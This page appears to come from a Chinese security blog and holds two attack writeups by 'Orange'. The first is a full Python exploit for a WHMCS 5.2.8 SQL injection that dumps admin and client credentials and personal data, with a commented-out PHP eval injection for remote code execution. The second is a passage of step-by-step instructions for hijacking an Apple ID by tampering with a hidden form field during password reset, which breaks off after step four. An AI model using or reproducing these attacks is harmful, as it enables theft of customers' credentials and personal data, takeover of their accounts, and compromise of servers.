漏洞

WHMCS 5.2.8 EXP

by Orange

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/env python
# 2013/10/18 - WHMCS <=5.2.8 SQL Injection # http://localhost.re/p/whmcs-528-vulnerability

url = 'http://client.target.com/'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql
print "Doing stuff: %s" % sqlUnion
#you could exploit any file that does a select, I randomly chose viewticket.php
r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read()
return re.search(r'

(.*?)

', r, re.DOTALL).group(1).strip()

#get admins
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')

#get users
count = int(exploit('(SELECT COUNT(id) FROM tblclients)'))
print "User count %d" % count
for i in range(count):
print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i)

#are you evil? yes, you are!
#php = "1';eval($_REQUEST['lol_whmcs']);#"
#r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()

[警告] 苹果apple id密码重置漏洞

by Orange

更新:有人说该漏洞已经修复,但是刚刚我用自己的ID又测试了一下发现这个漏洞依然存在!

今天一个朋友的苹果帐号密码被修改,iMac、iPad、iPhone上的所有资料都被抹除,iMac被锁定无法登陆,几百GB的资料瞬间化为乌有,怀疑是同行恶意行为。悲剧详情可到v2ex的这个帖子凭吊。

根据提示这个帖子描述漏洞详情的两个连接 国外版 国内版 里提到的方法,我用自己的apple id和新注册的apple id验证,的确存在

重置密码过程异常简单(使用chrome):

1. 登录https://iforgot.apple.com/iForgot/iForgot.html,填写指定的apple id,点击下一步
2. 选择验证方法—— 回答安全提示问题,点击下一步
3. 填写apple id注册时填写的出生日期,先不提交
4. 打开开发者工具,在elements处搜索”security”字样(某个hidden的input的value),改成null
5. (更多…)